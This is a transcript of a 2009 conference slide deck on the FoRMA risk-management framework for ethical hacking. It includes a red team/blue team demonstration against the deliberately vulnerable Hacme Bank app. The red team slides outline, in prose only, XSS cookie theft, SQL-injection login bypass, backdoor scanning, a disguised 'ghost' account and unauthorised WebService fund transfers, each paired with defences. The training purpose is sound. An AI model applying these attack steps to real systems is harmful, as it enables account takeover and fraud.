inverting risk management for ethical...
TRANSCRIPT
09/16/2009 © Kris Kahn, 2009
Inverting RiskManagement forEthical Hacking
SecureWorld Expo ‘09
© Kris Kahn, 200909/16/2009 2
Agenda
Speaker Introductions Learning Objectives Framework of Risk Management & Analysis (FoRMA) Duality of Risk Demonstration of Information Warfare Scenario Wrap-Up Q&A
© Kris Kahn, 200909/16/2009 3
Introductions
Speaker Kris Kahn, CISSP, CISA, CGEIT, OPSA
Senior Staff, Electronic Security Governance
Seagate Technology LLC
Co-Speaker Brian Shura, PCI-QSA
Director of Penetration Testing
AppSec Consulting
© Kris Kahn, 200909/16/2009 4
Audience
Attendees should be involved with penetration testing or managing risks, such as... IT Security Staff
Risk Managers
Company Officers
Ethical Hackers
Recommended knowledge... Familiar with Security Best Practices
Understand Risk Management Concepts
Experience with Penetration Testing
© Kris Kahn, 200909/16/2009 5
Learning Objectives
Understand the advantage of validating your security measures through ethical hacking
Recognize the benefits of applying Risk Management and Risk Exploitation methods
Understand your control options to mitigate risks
Balance your enterprise security using FoRMA
09/16/2009 © Kris Kahn, 2009
FoRMA Overview
© Kris Kahn, 200909/16/2009 7
Benefits of FoRMA
Big Picture Holistic relationship of related security models.
Technology Independent Universal Risk Management concepts.
Business Focused Minimize risk, instead of maximizing security.
© Kris Kahn, 200909/16/2009 8
Overview
A Framework for integrating industry standard models, such as CIA*, STRIDE* and others
Addresses Risk and Control elements: Risk
Threat Vulnerability
Control Technology Process
*: See references at the end of the presentation material
© Kris Kahn, 200909/16/2009 9
Goal of FoRMA: Risk Mitigation
– I.e. Control risks within acceptable limits to support business objectives
Establish Your Boundaries Define relevant policies, standards and best-practices Protect assets and resources in accordance with policy Detect policy violations Assure policy compliance
© Kris Kahn, 200909/16/2009 10
Building your foundation
Start from the ground level and work your way up!
Construct a strong security foundation to build your security policies, standards and best-practices. Use industry established security methodologies and codes of best practice to guide your standards and practices.
A security foundation supports all layers (including physical, network, application, etc), and addresses each security implementation phase (Awareness, Protection, Detection, and Assurance).
© Kris Kahn, 200909/16/2009 11
Building your foundation
Use Methodology with Sub-Model to evaluate Subject
*: See references at the end of the presentation material
Methodology Model Subject
Threat Management
STRIDE* Threat
Security Architecture
APAIN* Technology
Security Management
RIVET* Process
Asset/Resource Management
CIA* Vulnerability
© Kris Kahn, 200909/16/2009 12
Building your foundation
This is a layered model based on the ISO Protocol model* which identifies five (of the original seven) layers where critical assets and resources can be identified.
DataApplication
SystemNetworkPhysical
Identify, Analyze, Control, Maintain, repeat. This process life cycle will guide you through the framework to the
appropriate security resolution.
© Kris Kahn, 200909/16/2009 13
Risk Mitigation Life Cycle
Analyze
Maintain
Control
ThreatAssessment
VulnerabilityAssessment
AssessedRisk
ThreatMitigation
VulnerabilityReduction
Source Target
ControlledRisk
ManagedRisk
Result
ThreatManagement
AssetManagement
Identify ThreatDiscovery
AssetValuation
BusinessSurvey
© Kris Kahn, 200909/16/2009 14
Risk Mitigation Life Cycle: Identify
Risks can be received through many input channels, if due to a security incident, the threat source needs to be identified to help guide the remediation. Inactive threats from untrusted sources should also be discovered.
Valuating the business importance of the asset will drive the prioritization of the remedation.
Identify
Maintain
Control
Analyze
ThreatDiscovery
AssetValuation
BusinessSurvey
© Kris Kahn, 200909/16/2009 15
Risk Mitigation Cycle: Analyze
To determine the risk, you must understand the threat of attack and the vulnerability of the asset or resource. We measure and analyze these items in detail to determine the corresponding risk.
Analyze ThreatAssessment
VulnerabilityAssessment
AssessedRisk
Maintain
Control
Identify
© Kris Kahn, 200909/16/2009 16
Risk Mitigation Life Cycle: Control
Once you have assessed the risk, you can apply control-mechanisms in the form of technology to mitigate the threat or reduce the vulnerability.
Control ThreatMitigation
VulnerabilityReduction
ControlledRisk
Maintain
Analyze
Identify
© Kris Kahn, 200909/16/2009 17
Risk Mitigation Life Cycle: Maintain
Once a system is live, you apply counter-measures in the form of processes in the event of an attack (Incident Response) or to assure the integrity of the technology (Security Assessments).
Implement change control and regular audit processes to verify when an aspect of the formula has changed.
Maintain ManagedRisk
ThreatManagement
Asset/ResourceManagement
Control
Analyze
Identify
© Kris Kahn, 200909/16/2009 18
Vulnerability
Technology
Process
ThreatAwareness Protection
DetectionAssurance
FoRMA Model Overview
Risk Control
© Kris Kahn, 200909/16/2009 19
Implementation: Phases
Awareness Protection
DetectionAssurance
1 2
34
© Kris Kahn, 200909/16/2009 20
Risk Mitigation Phases & Life Cycle
IACM IACM
IACM IACM
Awareness Protection
DetectionAssurance
09/16/2009 © Kris Kahn, 2009
Duality of Risk
© Kris Kahn, 200909/16/2009 22
Risk Prevention vs Risk Exploitation
Using opposing Objectives, the model can be used strategically to take advantage of vulnerabilities instead of preventing damage.
Analyze
Control
Maintain
Identify Reconnaissance
Evaluate Risks
Exploit Risks
Risk/Control Divergence
Discover
Evaluate Risks
Mitigate Risks
Balance Risk/Control
© Kris Kahn, 200909/16/2009 23
Risk Analysis Strategies
The Blue Team’s strategy is create a balance by mitigating the risk by applying the appropriate amount of control. The remaining risk is acknowledged, regularly checked and managed.
Risk = Control (+/- acceptable residual control/risk)
The Red Team’s strategy is to subvert the control and leverage the risk, keeping the scales tipped in their favor.
Risk > Control
Both teams need to analyze the risks and the controls to be able to execute their strategies.
© Kris Kahn, 200909/16/2009 24
FoRMA Model for Ethical Hacking
Vulnerabilities
Technology
Process
ThreatsAwareness Protection
DetectionAssurance
Deception Intrusion
EvasionCorruption
Red TeamStrategy
Blue TeamStrategy
© Kris Kahn, 2009http://www.cybernetix.com/forma
© Kris Kahn, 200909/16/2009 25
Risk Exploitation Phases & Life Cycle
Deception Intrusion
EvasionCorruption
IACM IACM
IACM IACM
09/16/2009 © Kris Kahn, 2009
Information Warfare Scenario:
Red Team/Blue Team
Demonstration
Business Become profitable by offering banking services on-line Validate security controls through third-party Pen Test
Blue Team - Operations Support the business by identifying and reducing risk
Red Team - Ethical Hackers Exploit weaknesses to gain access to customer data,
administrative functions, and financial transactions
© Kris Kahn, 200909/16/2009 27
Objectives
Red Team1. Deception2. Intrusion3. Evasion4. Corruption
© Kris Kahn, 200909/16/2009 28
Penetration and Defense Life-Cycles
Blue Team1. Awareness2. Protection3. Detection4. Assurance
Background:The business selected a Windows system running an IIS web server as their online customer interface to their WebService-based banking system and their back-end database system (MS SQL Server).
© Kris Kahn, 200909/16/2009
Target
Free Penetration Testing platform
29
Hacme Bank simulates a "real-world" web services-enabled online banking application, which was built with a number of known and common vulnerabilities.
© Kris Kahn, 200909/16/2009 30
Red Team: Phase 1
I: Target Web Server
A: Manual JavaScript vulnerability test on Web-based forum
C: Cross-Site Scripting (XSS) code to steal admin cookie and reuse
M: Elevate privileges of own account to admin status
Deception Intrusion
EvasionCorruption
IACM
© Kris Kahn, 200909/16/2009
Analyze
Enter into forum to test:
Result:
Conclusion: Vulnerability exists to allow XSS attack that may
lead to Elevation of Privileges (Admin access)
31
Risk Level:
High
© Kris Kahn, 200909/16/2009
Control & Maintain XSS code to steal and reuse cookie to gain access:
Maintain: Set attacker account privilege to Admin type
32
Risk Level:
High
© Kris Kahn, 200909/16/2009 33
Blue Team: Phase 1
I: Focus on accounts and authorized access
A: Validate user accounts and appropriate privileges
C: Repair access/accounts as necessary
M: Improve coding practices
Awareness Protection
DetectionAssurance
IACM
© Kris Kahn, 200909/16/2009
Analyze
Validate Accounts through Database
Conclusion: Admin privileges inappropriate for user account,
may be due to error, root cause analysis in progress
Remove unauthorized admin privileges for user account
34
Risk Level:
High
© Kris Kahn, 200909/16/2009
Control & Maintain Find XSS attack in forum and cleanup:
Maintain: Patch to prevent special characters entered in
forum using input validation, improve coding practices to anticipate this vulnerability
35
Risk Level:
Low
© Kris Kahn, 200909/16/2009 36
Red Team: Phase 2
I: Target data flow
A: Test for SQL injection vulnerabilities
C: Exploit SQL injection flaws to bypass authentication and access admin account
M: Gather sensitive information from back-end database
Deception Intrusion
EvasionCorruption
IACM
© Kris Kahn, 200909/16/2009
Analyze
Perform manual test to use single quote (') to verify if a field is vulnerable to SQL Injection
Conclusion: SQL injection is possible and may lead to Elevation
of Privileges (Admin access)
37
Risk Level:
Medium
© Kris Kahn, 200909/16/2009
Control
Use SQL injection attack on password field
38
Risk Level:
High
Successfully bypassed the authentication logic
© Kris Kahn, 200909/16/2009
Control
39
Risk Level:
High
Leverage admin function to gather additional data
© Kris Kahn, 200909/16/2009
Maintain
40
Risk Level:
High
© Kris Kahn, 200909/16/2009 41
Blue Team: Phase 2
I: Focus on database server SQL activity
A: Assess potential unauthorized access to back-end database through application
C: Install web application firewall for SQL injection protection
M: Update application code to use parameterized queries to prevent SQL injection
Awareness Protection
DetectionAssurance
IACM
© Kris Kahn, 200909/16/2009
Analyze
Unauthorized SQL activity discovered
Conclusion: Unauthorized access to database through
application exposed user records with passwords
42
Risk Level:
High
© Kris Kahn, 200909/16/2009
Control & Maintain
Install WebKnight to mitigate risk of SQL injection attacks
Maintain: Update application code to use parameterized
queries to prevent SQL injection
Encrypt passwords in database
43
Risk Level:
Low
© Kris Kahn, 200909/16/2009 44
Red Team: Phase 3
I: Target hidden directories and files
A: Evade detection from using attack signatures and scan for application backdoors
C: Access the test admin functionality without authenticating
M: Create ghost account for system owner
Deception Intrusion
EvasionCorruption
IACM
© Kris Kahn, 200909/16/2009
Analyze Use SensePost Wikto to identify backdoors
Conclusion: Back-door may lead to admin functionality
45
Risk Level:
Medium
© Kris Kahn, 200909/16/2009
Control & Maintain Exploit discovered development access to admin
functionality
Maintain: Create “ghost” account similar to owner’s name
46
Risk Level:
High
© Kris Kahn, 200909/16/2009 47
Blue Team: Phase 3
I: Focus on web activity
A: Review logs for problems or malicious activity
C: Cleanup production environment and disable ghost account
M: Prevent external access to all admin functionality and only access admin functions locally
Awareness Protection
DetectionAssurance
IACM
© Kris Kahn, 200909/16/2009
Analyze Web Server log files, increased file size and activity
Conclusion: Web server scanning discovered a back-door
exposing admin functionality (again)
48
Risk Level:
High
© Kris Kahn, 200909/16/2009
Control & Maintain Remove development back-door and “ghost” account Maintain:
Prevent unauthorized access to admin tools use WebKnight to filter on the URL
49
Risk Level:
Low
© Kris Kahn, 200909/16/2009
Maintain
...and retain local admin functionality
50
Risk Level:
Low
© Kris Kahn, 200909/16/2009 51
Red Team: Phase 4
I: Identify other opportunities to access back-end data by reviewing details of previous error messages
A: Test access to XML forms
C: Use WebService to transfer funds
M: Re-enable attacker account
Deception Intrusion
EvasionCorruption
IACM
© Kris Kahn, 200909/16/2009
Analyze Identify other non-application opportunities to access the
data (captured previously)
52
Risk Level:
Low
© Kris Kahn, 200909/16/2009
Analyze Test available methods
Conclusion: Lookup by userID method is not restricted
53
Risk Level:
Medium
© Kris Kahn, 200909/16/2009
Control Use the soapUI tool to generate a request
54
Risk Level:
Medium
© Kris Kahn, 200909/16/2009
Control
Acquire account number using the GetUserAccounts method
55
Risk Level:
Medium
© Kris Kahn, 200909/16/2009
Control
Determine system owner’s account balance
56
Risk Level:
Medium
© Kris Kahn, 200909/16/2009
Control & Maintain
Transfer funds
Maintain: Use WebService to re-enable attacker account
57
Risk Level:
High
© Kris Kahn, 200909/16/2009 58
Blue Team: Phase 4
I: Focus on transaction activity
A: Identify significant banking activity and look for errors
C: Correct unauthorized account transfers, remove offending account
M: Implement authorization between the web application and the WebService
Awareness Protection
DetectionAssurance
IACM
© Kris Kahn, 200909/16/2009
Analyze Identify significant banking activity and account balance discrepancy
Conclusion: Internal WebService exposed externally is allowing
unauthorized and unauthenticated access
59
Risk Level:
High
© Kris Kahn, 200909/16/2009
Control & Maintain
Audit of all account activity and reverse unauthorized transactions.
Implement manual approval control for large on-line transfers.
Restrict the WebService to internal IP addresses only.
Maintain: Implement authentication between the calling
application (HackMe Bank) and the web service.
60
Risk Level:
Low
09/16/2009 © Kris Kahn, 2009
Wrap-Up
61
© Kris Kahn, 200909/16/2009 62
Wrap-Up
Design security controls with attacker perspective in mind (and visa-versa).
Be proactive in the implementation of phased controls.
Validate your controls through Ethical Hacking to ensure effectiveness.
Balance your enterprise security using a risk-based framework (FoRMA) that is focused on supporting business objectives.
© Kris Kahn, 200909/16/2009 63
Questions?
Feedback & Comments are welcome
Contact information: [email protected]
831-419-1256
© Kris Kahn, 200909/16/2009
Tools (downloadable, non-commercial)
Foundstone HacmeBank http://www.foundstone.com/us/resources/proddesc/
hacmebank.htm
Paros http://www.parosproxy.org/
SensePost Wikto http://www.sensepost.com/research/wikto/
SoapUI http://www.soapui.org/
SQL Express Profiler http://code.google.com/p/sqlexpressprofiler/downloads/list
WebKnight http://aqtronix.com/?PageID=99
64
© Kris Kahn, 200909/16/2009 65
References (*)
• Control Objectives for IT and Related Technology (COBIT) trademarked by the IT Governance Institute (ITGI)
• Open System Interconnection (OSI) reference model was developed by the International Organization for Standardization (ISO) in 1984, and it is now considered the primary architectural model for intercomputer communications.
• STRIDE Threat Model, conceived, built upon, and evangelized at Microsoft by Loren Hohnfelder, Praerit Garg, Jason Garms, and Michael Howard. Explained further in “Writing Secure Code, 2nd Ed” (ISBN 0-7356-1722-8), pages 83-86.
• CIA Security Model, author unknown, taught as part of the Common Body of Knowledge for CISSP curriculum.
• APAIN Acronym for Security Architecture, developed by Curtis Coleman in 2001.• RIVET Acronym for Security Management, developed by Kris Kahn 2004.• Failure Mode and Effects Analysis (FMEA) evolved as a process tool used by the
United States military as early as 1949 and is currently part of the SixSigma curriculum.
• Capability Maturity Model (CMM) is a trademark of Carnegie Mellon University.